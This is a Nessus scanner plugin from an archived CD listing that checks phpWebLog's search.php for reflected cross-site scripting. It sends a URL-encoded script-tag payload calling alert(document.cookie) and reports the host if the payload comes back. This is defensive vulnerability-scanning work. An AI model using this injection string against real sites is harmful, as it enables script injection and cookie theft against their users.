home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / phpweblog_xss.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  82 lines

  1. #
  2. # Script by Noam Rathaus GPLv2
  3. #
  4. # Filip Groszynski <groszynskif@gmail.com>
  5. # 2005-03-07 21:21
  6. # phpWebLog <= 0.5.3 arbitrary file inclusion (VXSfx)
  7.  
  8. if(description)
  9. {
  10.  script_id(17343);
  11.  script_version("$Revision: 1.1 $");
  12.  script_bugtraq_id(12747);
  13.  
  14.  name["english"] = "phpWebLog Cross Site Scripting";
  15.  
  16.  script_name(english:name["english"]);
  17.  
  18.  desc["english"] = "
  19. The remote host is running phpWebLog, a news and content management 
  20. system written in PHP.
  21.  
  22. Due to improper filtering done by search.php a remote attacker
  23. can cause the phpWebLog product to include arbitrary HTML and/or
  24. JavaScript.
  25.  
  26. An attacker may use this bug to perform a cross site scripting attack
  27. using the remote host
  28.  
  29. Solution : Disable this script
  30. Risk factor: Medium";
  31.  
  32.  script_description(english:desc["english"]);
  33.  
  34.  summary["english"] = "Checks for the presence of a phpWebLog XSS";
  35.  
  36.  script_summary(english:summary["english"]);
  37.  
  38.  script_category(ACT_ATTACK);
  39.  
  40.  script_copyright(english:"This script is Copyright (C) 2005 Noam Rathaus");
  41.  family["english"] = "CGI abuses";
  42.  family["francais"] = "Abus de CGI";
  43.  script_family(english:family["english"], francais:family["francais"]);
  44.  script_dependencie("cross_site_scripting.nasl");
  45.  script_require_ports("Services/www", 80);
  46.  exit(0);
  47. }
  48.  
  49. #
  50. # The script code starts here
  51. #
  52.  
  53.  
  54. include("http_func.inc");
  55. include("http_keepalive.inc");
  56.  
  57. port = get_http_port(default:80);
  58.  
  59. if(!get_port_state(port))exit(0);
  60. if(!can_host_php(port:port))exit(0);
  61. if (  get_kb_item(string("www/", port, "/generic_xss")) ) exit(0);
  62.  
  63. debug = 0;
  64.  
  65. function check(loc)
  66. {
  67.  req = http_get(item: string(loc, "/search.php?query=we+%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&topic=0&limit=30"), port:port);
  68.  r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
  69.  if( r == NULL )exit(0);
  70.  if('<script>alert(document.cookie)</script>"' >< r)
  71.  {
  72.   security_warning(port);
  73.   exit(0);
  74.  }
  75. }
  76.  
  77. foreach dir ( cgi_dirs() )
  78. {
  79.  check(loc:dir);
  80. }
  81.  
  82.